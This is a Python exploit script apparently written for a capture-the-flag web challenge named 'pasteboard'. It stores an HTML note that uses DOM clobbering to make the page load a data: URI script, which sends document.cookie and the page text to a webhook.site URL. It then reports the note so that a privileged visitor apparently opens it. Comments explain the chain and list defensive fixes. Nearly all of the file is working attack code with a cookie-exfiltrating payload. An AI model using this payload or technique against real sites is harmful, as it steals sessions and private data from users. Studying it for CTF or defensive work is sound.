import requests

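# Challenge instance under test and the request inspector that receives the
# callback. webhook.site is a third-party service: whatever the payload sends
# there is readable by anyone holding this token URL.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# requests applies no timeout by default, so an unresponsive instance would
# hang the script forever; bound every call instead.
REQUEST_TIMEOUT = 10

# Technique: DOM clobbering through stored HTML in the note body.
#   * <form id="errorReporter"> makes the browser expose the element as
#     window.errorReporter (an HTMLFormElement).
#   * <input name="path"> makes errorReporter.path an HTMLInputElement, so
#     errorReporter.path.value is the attacker-chosen string.
#   * The value is a data: URI carrying JavaScript (a script hosted on a
#     public service would work the same way); it sends document.cookie and
#     the page text to WEBHOOK.
#   * The <img> error handler sets window.lastRenderError and throws.
# NOTE(review): presumably the page's own error-reporting script then loads
# errorReporter.path.value as a script; that code is not part of this file.
# Whether the inline onerror attribute runs also depends on the target's CSP,
# which is not visible here.
#
# What this demonstrates for defenders: the note renderer keeps id/name
# attributes on user-supplied HTML, page code reads its configuration from a
# window-named global without checking it is its own object, and the script
# policy accepts data: URLs. Stripping or namespacing id/name in the
# sanitizer, keeping such configuration in module scope, and a script-src
# without data: each break the chain; HttpOnly cookies keep them out of
# document.cookie.
payload = f'''<form id="errorReporter">
<input name="path" value="data:text/javascript,fetch('{WEBHOOK}?cookie='+encodeURIComponent(document.cookie)+'&body='+encodeURIComponent(document.body.innerText))">
</form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

print("[*] Payload that will be sent:")
print(payload)
print()

# One session so that any cookie set while creating the note is reused for
# the report request.
session = requests.Session()
response = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Exploit", "body": payload},
    allow_redirects=False,  # the new note's path is read from the redirect
    timeout=REQUEST_TIMEOUT,
)

location = response.headers.get("Location")
if response.status_code == 302 and location:
    print(f"[+] Note URL: {BASE_URL}{location}")

    # The note path is submitted to /report exactly as the server returned it.
    # NOTE(review): presumably /report has a privileged browser visit the
    # note; confirm against the challenge source.
    report = session.post(
        f"{BASE_URL}/report",
        data={"url": location},
        timeout=REQUEST_TIMEOUT,
    )
    print(f"[+] Report status: {report.status_code}")

    # Build the inspector link from WEBHOOK so the two cannot drift apart.
    inspector_token = WEBHOOK.rstrip("/").rsplit("/", 1)[-1]
    print(f"[*] Check webhook: https://webhook.site/#!/{inspector_token}")
else:
    # Previously a non-redirect answer (or a 302 without Location) ended the
    # script silently, or printed a URL ending in "None".
    print(
        f"[-] Note creation failed: status {response.status_code}, "
        f"Location={location!r}"
    )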
